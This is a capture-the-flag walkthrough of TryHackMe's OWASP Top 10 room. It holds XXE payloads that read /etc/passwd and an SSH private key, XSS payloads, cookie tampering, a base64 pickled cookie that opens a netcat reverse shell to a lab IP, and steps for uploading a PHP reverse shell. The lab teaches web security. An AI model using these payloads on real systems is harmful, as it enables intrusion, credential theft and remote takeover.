In this walk through, we will be going through the OWASP Top 10 room from Tryhackme. This room has been designed to teach us about the OWASP Top 10 vulnerabilities and critical web security risks and how to exploit them in detail. So, let’s get started without any delay.
Table of Contents
Task 1 – Introduction
- Broken Authentication
- Sensitive Data Exposure
- XML External Entity
- Broken Access Control
- Security Misconfiguration
- Cross-site Scripting
- Insecure Deserialization
- Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
Task 2 – Accessing machines
Task 3 – [Severity 1] Injection
Question 1 – I’ve understood Injection attacks.
Task 4 – [Severity 1] OS Command Injection
Question 1 – I’ve understood command injection.
Task 5 – [Severity 1] Command Injection Practical
Question 1 – What strange text file is in the website root directory?
Question 2 – How many non-root/non-service/non-daemon users are there?
Question 3 – What user is this app running as?
Question 4 – What is the user’s shell set as?
Question 5 – What version of Ubuntu is running?
Question 6 – Print out the MOTD. What favorite beverage is shown?
Task 6 – [Severity 2] Broken Authentication
Question 1 – I’ve understood broken authentication mechanisms.
Task 7 – [Severity 2] Broken Authentication Practical
Try to register a user name darren, you’ll see that user already exists so then try to register a user ” darren” and you’ll see that you are now logged in and will be able to see the content present only in Darren’s account which in our case is the flag that you need to retrieve.
Question 1 – What is the flag that you found in darren’s account?
Question 2 – Now try to do the same trick and see if you can login as arthur.
Question 3 – What is the flag that you found in arthur’s account?
Task 8 – [Severity 3] Sensitive Data Exposure (Introduction)
Task 9 – [Severity 3] Sensitive Data Exposure (Supporting Material 1)
Question 1 – Read and understand the supporting material on SQLite Databases.
Task 10 – [Severity 3] Sensitive Data Exposure (Supporting Material 2)
Question 1 – Read the supporting material about cracking hashes.
Task 11 – [Severity 3] Sensitive Data Exposure (Challenge)
Question 1 – What is the name of the mentioned directory?
Question 2 – Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Question 3 – Use the supporting material to access the sensitive data. What is the password hash of the admin user?
Question 4 – What is the admin’s plaintext password?
Question 5 – Login as the admin. What is the flag?
Task 12 – [Severity 4] XML External Entity
Question 1 – Deploy the machine attached to the task.
Task 13 – [Severity 4 XML External Entity – eXtensible Markup Language
Question 1 – Full form of XML
Extensible Markup Language
Question 2 – Is it compulsory to have XML prolog in XML documents?
Question 3 – Can we validate XML documents against a schema?
Question 4 – How can we specify XML version and encoding in XML document?
Task 14 – [Severity 4] XML External Entity – DTD
Question 1 – How do you define a new ELEMENT?
Question 2 – How do you define a ROOT element?
Question 3 – How do you define a new ENTITY?
Task 15 – [Severity 4] XML External Entity – XXE Payload
Question 1 – Try the payload mentioned in description on the website.
Payload - `<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>`
Task 16 – [Severity 4] XML External Entity – Exploiting
Question 1 – Try to display your own name using any payload.
Payload: <?xml version="1.0"?><!DOCTYPE Tryhackme [<!ENTITY name "funkt10n"> ]> <userInfo> <firstName>null</firstName> <lastName>&name;</lastName> </userInfo>
Question 2 – See if you can read the /etc/passwd
Payload: `<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>`
Question 3 – What is the name of the user in /etc/passwd
Question 4 – Where is falcon’s SSH key located?
Question 5 – What are the first 18 characters for falcon’s private key
Payload: `<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file://home/falcon/.ssh/id_rsa'>]> <root>&read;</root>`
Task 17 – [Severity 5] Broken Access Control
Question 1 – Read and understand how broken access control works.
Task 18 – [Severity 5] Broken Access Control (IDOR Challenge)
Question 1 – Read and understand how IDOR works.
Question 2 – Deploy the machine and go to http://10.10.106.96 – Login with the username being noot and the password test1234.
Question 3 – Look at other users notes. What is the flag?
Task 19 – [Severity 6] Security Misconfiguration
Question 1 – Deploy the VM
Question 2 – Hack into the webapp, and find the flag!
Default credentials found on: https://github.com/NinjaJc01/PensiveNotes
Task 20 – [Severity 7] Cross-site Scripting
Question 1 – Deploy the VM
Question 2 – Navigate to http://10.10.192.244/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
Question 3 – On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.
Question 4 – Now navigate to http://10.10.192.244/ in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own HTML.
Register with a test user first and then type the following comment as payload.
- Payload: Hello Friend!
Question 4 – On the same page, create an alert popup box appear on the page with your document cookies.
Payload: <script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
Task 21 – [Severity 8] Insecure Deserialization
Question 1 – Who developed the Tomcat application?
The Apache Software Foundation
Question 2 – What type of attack that crashes services can be performed with insecure deserialization?
Denial of Service
Task 22 – [Severity 8] Insecure Deserialization – Objects
Question 1 – Select the correct term of the following statement:
if a dog was sleeping, would this be:_
A) A State
B) A Behaviour
Task 23 – [Severity 8] Insecure Deserialization – Deserialization
Question 1 – What is the name of the base-2 formatting that data is sent across a network as?
Task 24 – [Severity 8] Insecure Deserialization – Cookies
Question 1 – If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?
Question 2 – What is the acronym for the web technology that Secure cookies work over?
Task 25 – [Severity 8] Insecure Deserialization – Cookies Practical
Question 1 – 1st flag (cookie value)
Session ID - "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAY2VkZDI2OTYxMTNlNDBlNGIxZTMzYjE5ODg5MmYwY2NxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg=="
Decode with: base64decode.org
Question 2 – 2nd flag (admin dashboard)
Modifying Cookie Values
Notice here that you have a cookie named “userType”. You are currently a user, as confirmed by your information on the “myprofile” page.
This application determines what you can and cannot see by your userType. What if you wanted to be come an admin?
Double left-click the “Value” column of “userType” to modify the contents. Let’s change our userType to “admin” and navigate to http://10.10.13.24/admin to answer the second flag.
Go to page: http://10.10.13.24/admin
Task 26 – [Severity 8] Insecure Deserialization – Code Execution
Question 1 – flag.txt
Session ID - gASVdgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFtybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTguMTA3LjE2NyA0NDQ0ID4gL3RtcC9mlIWUUpQu
- Click on Feedback link and you will get a reverse shell.
Task 27 – [Severity 9] Components With Known Vulnerabilities – Intro
Question 1 – Read above.
Task 28 – [Severity 9] Components With Known Vulnerabilities – Exploit
Question 1 – Read the above!
Task 29 – [Severity 9] Components With Known Vulnerabilities – Lab
Question 1 – How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
- We have an application named CSE Bookstore. At the bottom right corner we have admin login mentioning 2017, which might reveal the date on which the portal is running, quite old.
- Finding exploit on google related to CSE Bookstore 2017
- Download the exploit.
- Firing the exploiting by – python3 47887.py http://10.10.162.73/
Another method for exploiting
- Go to admin login page
- Try default credentials: admin:admin
- You will be logged into the admin panel
- Click on Edit
- Click on Browse and upload a revese PHP shell on the server.
- Click Confirm
- Get revese PHP shell here: https://github.com/pentestmonkey/php-reverse-shell and change the IP inside it to your Try Hack me VPN IP.
- Now setup a netcat listener on the specified port.
- We have uploaded the reverse shell where the images for the products are store. Right click on any product image and open in new tab. you will get the following path:
- Now execute the reverse shell by visiting the following path – http://10.10.162.73/bootstrap/img/rev.php. You should get a connection back.
- We have successfully pwned the system once more.
Task 30 – [Severity 10] Insufficient Logging and Monitoring
Question 1 – What IP address is the attacker using?
Question 2 – What kind of attack is being carried out?
Task 31 – What Next?
Also Read: Tryhackme – Overpass 2 (Hacked)
So that was “OWASP Top 10” for you. In this room, we have covered the OWASP Top 10 web application vulnerabilities and their exploitation, We have covered vulnerabilities like Injection which includes SQLi and more. Then, we took a dive in Broken authentication. Moving on, we learned about XSS, XXE, IDOR, Insecure Deserialization, Insufficient logging, Common known exploits and much more. This room was certainly very lengthy but covers everything in great detail regarding the OWASP Top 10 risks and vulnerabilities. On that note, i will take your leave and will meet you in next one. Till then, “Keep Hacking”.